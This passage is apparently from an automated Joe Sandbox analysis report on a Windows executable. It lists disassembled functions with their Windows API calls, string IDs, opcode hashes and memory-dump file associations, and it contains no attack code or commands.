                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                • String ID:
                                                                • API String ID: 3970641297-0
                                                                • Opcode ID: f96b536cc5d7791d9bf739a5debaef31921c81f28bb63e41ad3845cabd22f155
                                                                • Instruction ID: b16116216a3d24536e27ba48669843f9bfe5fb09d4870dfdcfc96ed6d6235638
                                                                • Opcode Fuzzy Hash: f96b536cc5d7791d9bf739a5debaef31921c81f28bb63e41ad3845cabd22f155
                                                                • Instruction Fuzzy Hash: 5F116D72501548BFEF128FA8DC45EEABBA9EF4D3A4F044215FA1452150D73A9CA0DBA0
                                                                APIs
                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 00733B56
                                                                  • Part of subcall function 00733AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00733AD2
                                                                  • Part of subcall function 00733AA3: ___AdjustPointer.LIBCMT ref: 00733AED
                                                                • _UnwindNestedFrames.LIBCMT ref: 00733B6B
                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00733B7C
                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00733BA4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                • String ID:
                                                                • API String ID: 737400349-0
                                                                • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                • Instruction ID: fb773ee0a676afe724b71170e27e3788d94d1134f51c031a22b100f50fe37024
                                                                • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                • Instruction Fuzzy Hash: 19012972100148BBEF225E95CC46EEB7B6AEF48754F044014FE4866122C73AE961DBA0
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007113C6,00000000,00000000,?,0074301A,007113C6,00000000,00000000,00000000,?,0074328B,00000006,FlsSetValue), ref: 007430A5
                                                                • GetLastError.KERNEL32(?,0074301A,007113C6,00000000,00000000,00000000,?,0074328B,00000006,FlsSetValue,007B2290,FlsSetValue,00000000,00000364,?,00742E46), ref: 007430B1
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0074301A,007113C6,00000000,00000000,00000000,?,0074328B,00000006,FlsSetValue,007B2290,FlsSetValue,00000000), ref: 007430BF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad$ErrorLast
                                                                • String ID:
                                                                • API String ID: 3177248105-0
                                                                • Opcode ID: 4a1a8d35da4acb023a0540a27b39e6112f871098e2351a9d12ac1efb0845a0ea
                                                                • Instruction ID: d6d4cceb2e85661b7d54412e8a28d640fc32cab3a9c5e2751c1d397920ba2bd9
                                                                • Opcode Fuzzy Hash: 4a1a8d35da4acb023a0540a27b39e6112f871098e2351a9d12ac1efb0845a0ea
                                                                • Instruction Fuzzy Hash: 73012B32301226BBCB314B789C45A577B9AAF46B61B204720F91DE71A0C72DD901C6E4
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0077747F
                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00777497
                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007774AC
                                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 007774CA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                                • String ID:
                                                                • API String ID: 1352324309-0
                                                                • Opcode ID: c4632a4660b45bcab75c92cd97b203b4ccbf3b44c270c3e32b36aa399529da00
                                                                • Instruction ID: 7d697ee27c0fa2f50edce55a09ce4ac8bcff387172736c0978a160c5a9542ed3
                                                                • Opcode Fuzzy Hash: c4632a4660b45bcab75c92cd97b203b4ccbf3b44c270c3e32b36aa399529da00
                                                                • Instruction Fuzzy Hash: 1511C0B1209354AFEB248F24DC08FA27FFCEB44B50F10C569A61AD6191D7B8E904DB60
                                                                APIs
                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0077ACD3,?,00008000), ref: 0077B0C4
                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0077ACD3,?,00008000), ref: 0077B0E9
                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0077ACD3,?,00008000), ref: 0077B0F3
                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0077ACD3,?,00008000), ref: 0077B126
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CounterPerformanceQuerySleep
                                                                • String ID:
                                                                • API String ID: 2875609808-0
                                                                • Opcode ID: 2baaa5a86f6eda4dce2fb6cb5688d83d2b8764af3ae19b7f42fc0220f531a6f9
                                                                • Instruction ID: 9cfc8a4ed73d6a8acaf18e2a0a2f850d2751789e73b9098eef03c3e9077e4492
                                                                • Opcode Fuzzy Hash: 2baaa5a86f6eda4dce2fb6cb5688d83d2b8764af3ae19b7f42fc0220f531a6f9
                                                                • Instruction Fuzzy Hash: 0211AD70E0152CE7CF00AFE4E9697EEBB78FF4A351F408086D945B2181CB388A51CB55
                                                                APIs
                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00772DC5
                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00772DD6
                                                                • GetCurrentThreadId.KERNEL32 ref: 00772DDD
                                                                • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00772DE4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                • String ID:
                                                                • API String ID: 2710830443-0
                                                                • Opcode ID: ed97e9ec6dea7840fa5eca24d4b015007cfee81c602030e02bdb32be63740f17
                                                                • Instruction ID: 5e52246df146b520392c58fd946df717b42ec19500565b711ebf8269865dbe1b
                                                                • Opcode Fuzzy Hash: ed97e9ec6dea7840fa5eca24d4b015007cfee81c602030e02bdb32be63740f17
                                                                • Instruction Fuzzy Hash: F5E092716012247BDB315B729C0EFEB3E6CEF83BA1F008015F109D10819AA8C841C6B1
                                                                APIs
                                                                  • Part of subcall function 00729639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00729693
                                                                  • Part of subcall function 00729639: SelectObject.GDI32(?,00000000), ref: 007296A2
                                                                  • Part of subcall function 00729639: BeginPath.GDI32(?), ref: 007296B9
                                                                  • Part of subcall function 00729639: SelectObject.GDI32(?,00000000), ref: 007296E2
                                                                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 007A8887
                                                                • LineTo.GDI32(?,?,?), ref: 007A8894
                                                                • EndPath.GDI32(?), ref: 007A88A4
                                                                • StrokePath.GDI32(?), ref: 007A88B2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                • String ID:
                                                                • API String ID: 1539411459-0
                                                                • Opcode ID: 264c68e86d32b17346fef68ce5a33bf84361f113f9ab0cdd0157090ff7da2845
                                                                • Instruction ID: 5af2d0b8fdc43b2f7eadc4709215949313a1e45cc11b3ced30b144e275de48c3
                                                                • Opcode Fuzzy Hash: 264c68e86d32b17346fef68ce5a33bf84361f113f9ab0cdd0157090ff7da2845
                                                                • Instruction Fuzzy Hash: 9EF03A36046298FADB135F94AC0EFCE3A59AF4A310F44C100FA11651E2CB7D5511CBA9
                                                                APIs
                                                                • GetSysColor.USER32(00000008), ref: 007298CC
                                                                • SetTextColor.GDI32(?,?), ref: 007298D6
                                                                • SetBkMode.GDI32(?,00000001), ref: 007298E9
                                                                • GetStockObject.GDI32(00000005), ref: 007298F1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Color$ModeObjectStockText
                                                                • String ID:
                                                                • API String ID: 4037423528-0
                                                                • Opcode ID: a1f37ed5990670bc7e213084769338620fa5c839cbf1cc8b4e6f515d5ea8f3b9
                                                                • Instruction ID: 9c9aa6bc14fb10cbaf16ab1fda7488236249375bdec1974ae689e1d93bc762b6
                                                                • Opcode Fuzzy Hash: a1f37ed5990670bc7e213084769338620fa5c839cbf1cc8b4e6f515d5ea8f3b9
                                                                • Instruction Fuzzy Hash: A0E06531244284BADB225B74FC09BD83F50EB93375F14C219F6F6540E1C7794650DB10
                                                                APIs
                                                                • GetCurrentThread.KERNEL32 ref: 00771634
                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,007711D9), ref: 0077163B
                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007711D9), ref: 00771648
                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,007711D9), ref: 0077164F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CurrentOpenProcessThreadToken
                                                                • String ID:
                                                                • API String ID: 3974789173-0
                                                                • Opcode ID: 7d6b5c69862bd7aaf3afd2b3a4d9a65eafb134faa5211911b7156684f2c590aa
                                                                • Instruction ID: e8a0564065f0b8902758be5b0c911e8e7871284facb81b3d28a4355e838859f2
                                                                • Opcode Fuzzy Hash: 7d6b5c69862bd7aaf3afd2b3a4d9a65eafb134faa5211911b7156684f2c590aa
                                                                • Instruction Fuzzy Hash: 41E08631601211FBDB201FA49E0DB473B7CAF867D1F14C808F245C9080DA3C4540C759
                                                                APIs
                                                                • GetDesktopWindow.USER32 ref: 0076D858
                                                                • GetDC.USER32(00000000), ref: 0076D862
                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0076D882
                                                                • ReleaseDC.USER32(?), ref: 0076D8A3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                • String ID:
                                                                • API String ID: 2889604237-0
                                                                • Opcode ID: e3ea4095172ef440f9ba5e7a5ab663e791111ede09ade675f21337be0df286af
                                                                • Instruction ID: 741e37b7bd531bf5342827510a8d55408346f31af3fa7cfcb7366c5d9b335626
                                                                • Opcode Fuzzy Hash: e3ea4095172ef440f9ba5e7a5ab663e791111ede09ade675f21337be0df286af
                                                                • Instruction Fuzzy Hash: 30E01AB1800205EFCB529FA0D80C66EBBB5FB49310F14D009E806E7350CB3C8941AF44
                                                                APIs
                                                                • GetDesktopWindow.USER32 ref: 0076D86C
                                                                • GetDC.USER32(00000000), ref: 0076D876
                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0076D882
                                                                • ReleaseDC.USER32(?), ref: 0076D8A3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                • String ID:
                                                                • API String ID: 2889604237-0
                                                                • Opcode ID: 50b0304b434d9e8c3ae73be0564f2a114ce7b55a78ca19472196491a8800b464
                                                                • Instruction ID: 5df945cd1ef420ed72db4d1bbb160294ddd3e697e89e8e27357517169cb7e31b
                                                                • Opcode Fuzzy Hash: 50b0304b434d9e8c3ae73be0564f2a114ce7b55a78ca19472196491a8800b464
                                                                • Instruction Fuzzy Hash: F3E092B5800204EFCB56AFA4D80C66EBBB5BB89311B149449E94AE7360DB3C9942AF54
                                                                APIs
                                                                  • Part of subcall function 00717620: _wcslen.LIBCMT ref: 00717625
                                                                • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00784ED4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Connection_wcslen
                                                                • String ID: *$LPT
                                                                • API String ID: 1725874428-3443410124
                                                                • Opcode ID: 97f2800513769cfc6775a9049fa391fa1c0080e53d728c771c22d5e2aaeaa7bf
                                                                • Instruction ID: fae27524edb2e5a0e25ad67425236742fddd8e1c5f37204f6e101f43773634c2
                                                                • Opcode Fuzzy Hash: 97f2800513769cfc6775a9049fa391fa1c0080e53d728c771c22d5e2aaeaa7bf
                                                                • Instruction Fuzzy Hash: F5914E75A00205DFCB15EF58C484EAABBF1AF44304F19809DE50A9F3A2D779ED85CB91
                                                                APIs
                                                                • __startOneArgErrorHandling.LIBCMT ref: 0073E30D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ErrorHandling__start
                                                                • String ID: pow
                                                                • API String ID: 3213639722-2276729525
                                                                • Opcode ID: 7d97af43f3670dfdf40d75167aff79011ab0b6dd7ea388af68549a0dff0c55a1
                                                                • Instruction ID: 62425bd3df622c85d76ea09a0da40b3339cc8f140b09778aa95f41f1cb9b65bb
                                                                • Opcode Fuzzy Hash: 7d97af43f3670dfdf40d75167aff79011ab0b6dd7ea388af68549a0dff0c55a1
                                                                • Instruction Fuzzy Hash: F4516E61E1D102D6EB197724CD457BA3B94EF40740F748E58F0D5422EBEB3D8C92DA46
                                                                APIs
                                                                • CharUpperBuffW.USER32(0076569E,00000000,?,007ACC08,?,00000000,00000000), ref: 007978DD
                                                                  • Part of subcall function 00716B57: _wcslen.LIBCMT ref: 00716B6A
                                                                • CharUpperBuffW.USER32(0076569E,00000000,?,007ACC08,00000000,?,00000000,00000000), ref: 0079783B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: BuffCharUpper$_wcslen
                                                                • String ID: <s}
                                                                • API String ID: 3544283678-4170637906
                                                                • Opcode ID: c74b279ff15f80f2f8aa791cffba211776808f353b793f256735b78c3f845173
                                                                • Instruction ID: 9178acf46b7abae1090fa73a1748172c2e1e973f7c00b95846b9bc74d9a879f7
                                                                • Opcode Fuzzy Hash: c74b279ff15f80f2f8aa791cffba211776808f353b793f256735b78c3f845173
                                                                • Instruction Fuzzy Hash: 67616E72924118EACF09EBE8DC95DFDB378FF14300B444126F542A7195EF38AA85CBA0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #
                                                                • API String ID: 0-1885708031
                                                                • Opcode ID: 5026c902a4c10ee3bc6088d928b7d91088613be3ac972038ecadc8e82fc4bdbe
                                                                • Instruction ID: a48991b9de0feb51e804284b8db169ffbbcd1d7a5cb97d46efbc32101d8750ec
                                                                • Opcode Fuzzy Hash: 5026c902a4c10ee3bc6088d928b7d91088613be3ac972038ecadc8e82fc4bdbe
                                                                • Instruction Fuzzy Hash: 91510339500256DFDB15DF68D485AFA7BA8EF56310F248059FC929B2D0D63C9D82CBA0
                                                                APIs
                                                                • Sleep.KERNEL32(00000000), ref: 0072F2A2
                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0072F2BB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: GlobalMemorySleepStatus
                                                                • String ID: @
                                                                • API String ID: 2783356886-2766056989
                                                                • Opcode ID: f5b02ca3b21e908836a503f0bfc741537a5c1b0a865304d532cdef6ba9fcc623
                                                                • Instruction ID: e05e476af38151a7b1e083595fed35b6570ee2461905869f12b55a26f86f3841
                                                                • Opcode Fuzzy Hash: f5b02ca3b21e908836a503f0bfc741537a5c1b0a865304d532cdef6ba9fcc623
                                                                • Instruction Fuzzy Hash: 4D513572408744DBD320AF54D88ABABBBF8FB85700F81885DF199411A5EB3485A9CB66
                                                                APIs
                                                                • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 007957E0
                                                                • _wcslen.LIBCMT ref: 007957EC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: BuffCharUpper_wcslen
                                                                • String ID: CALLARGARRAY
                                                                • API String ID: 157775604-1150593374
                                                                • Opcode ID: 95bd77479a151d736339a525185db18c8386ae7a0f36f501dc73d8154fdf9f40
                                                                • Instruction ID: eef349a70a4dc84639301aff7ceda9b1026a23149804fc9eb42a5413bf0f9a1e
                                                                • Opcode Fuzzy Hash: 95bd77479a151d736339a525185db18c8386ae7a0f36f501dc73d8154fdf9f40
                                                                • Instruction Fuzzy Hash: E2419F71A00219DFCF05DFA8D889DAEBBB5EF59360F108069E505A7391E7389D81CBA0
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 0078D130
                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0078D13A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
